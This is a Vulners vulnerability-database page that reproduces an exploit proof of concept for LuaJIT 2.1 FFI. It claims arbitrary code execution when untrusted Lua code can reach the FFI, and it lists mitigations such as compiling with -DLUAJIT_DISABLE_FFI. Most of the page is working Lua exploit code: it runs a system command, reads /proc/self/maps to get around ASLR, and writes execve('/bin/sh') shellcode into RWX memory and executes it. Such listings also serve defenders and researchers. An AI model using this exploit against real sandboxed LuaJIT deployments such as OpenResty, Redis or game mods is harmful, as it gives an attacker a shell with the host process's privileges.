Vulners
Lucene search
📄 LuaJIT 2.1.1774638290 Arbitrary Code Execution
-- Exploit Title: LuaJIT 2.1.1774638290 - Arbitrary Code Execution via FFI Unrestricted Syscall Access
-- Date: 2026-03-29
-- Exploit Author: TaurusOmar
-- Vendor Homepage: https://luajit.org/
-- Software Link: https://luajit.org/download.html
-- Version: LuaJIT 2.1.1774638290 (latest)
-- Tested on: Linux x86-64 (Arch Linux)
-- Description:
-- LuaJIT's Foreign Function Interface (FFI) provides unrestricted access
-- to native C functions including syscall(), mmap(), mprotect() and
-- arbitrary shared library loading. When FFI is accessible to untrusted
-- Lua code in embedding scenarios (OpenResty, Redis, game engines, IoT),
-- an attacker can achieve arbitrary code execution with full process
-- privileges including shellcode execution via mmap(RWX)+ffi.copy()+ffi.cast().
--
-- This affects any application embedding LuaJIT 2.1.x without explicitly
-- disabling FFI (-DLUAJIT_DISABLE_FFI) or removing it from the sandbox
-- environment before executing untrusted scripts.
--
-- Verified on LuaJIT 2.1.1774638290 (March 2026) — latest version.
--
-- Attack scenarios:
-- - OpenResty/Nginx with user-controlled Lua scripts
-- - Redis with exposed EVAL interface
-- - Game engines with Lua modding systems
-- - IoT devices with Lua scripting interface
--
-- Mitigation:
-- - Compile with -DLUAJIT_DISABLE_FFI
-- - Remove 'ffi' from sandbox environment table
-- - Apply OS-level restrictions: seccomp-bpf, AppArmor, namespaces
local ffi = require("ffi")
local bit = require("bit")
ffi.cdef[[
int getpid(void);
long syscall(long number, ...);
int system(const char *command);
void *mmap(void *addr, size_t length, int prot,
int flags, int fd, long offset);
int munmap(void *addr, size_t length);
]]
print("=" .. string.rep("=", 55))
print(" LuaJIT 2.1.x - FFI Unrestricted Syscall Access PoC")
print("=" .. string.rep("=", 55))
-- dlsym resolves libc symbols without restriction
local pid_libc = ffi.C.getpid()
print("\n[1] ffi.C.getpid() via dlsym: " .. pid_libc)
-- Direct kernel syscall channel (SYS_getpid = 39 x86-64)
local pid_sc = tonumber(ffi.C.syscall(39))
print("[2] syscall(39) direct: " .. pid_sc)
if pid_libc == pid_sc then
print("[+] Both channels confirmed active\n")
end
-- ASLR bypass via /proc/self/maps
local f = io.open("/proc/self/maps", "r")
for line in f:lines() do
if line:find("libc.so") and line:find("r--p") then
local base = tonumber("0x" .. line:match("^(%x+)"))
print("[3] libc base (ASLR bypass): 0x" .. string.format("%x", base))
break
end
end
f:close()
-- Arbitrary command execution
print("[4] ffi.C.system('id'):")
ffi.C.system("id")
-- Shellcode execution via mmap(RWX)
print("\n[5] Shellcode execution via mmap(RWX):")
local PROT_RWX = bit.bor(1, 2, 4)
local MAP_FLAGS = bit.bor(0x02, 0x20)
-- x86-64 execve("/bin/sh", NULL, NULL) - syscall 59
local shellcode =
"\x48\x31\xd2"
.. "\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
.. "\x53"
.. "\x48\x89\xe7"
.. "\x48\x31\xf6"
.. "\x48\x31\xc0"
.. "\xb0\x3b"
.. "\x0f\x05"
local mem = ffi.C.mmap(nil, 4096, PROT_RWX, MAP_FLAGS, -1, 0)
if ffi.cast("long", mem) ~= -1 then
print(" RWX region: 0x" .. string.format("%x", ffi.cast("unsigned long", mem)))
ffi.copy(mem, shellcode, #shellcode)
print(" Shellcode written. Executing execve('/bin/sh')...")
local fn = ffi.cast("void(*)(void)", mem)
fn()
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Mar 2026 00:00Current
6.4Medium risk
Vulners AI Score6.4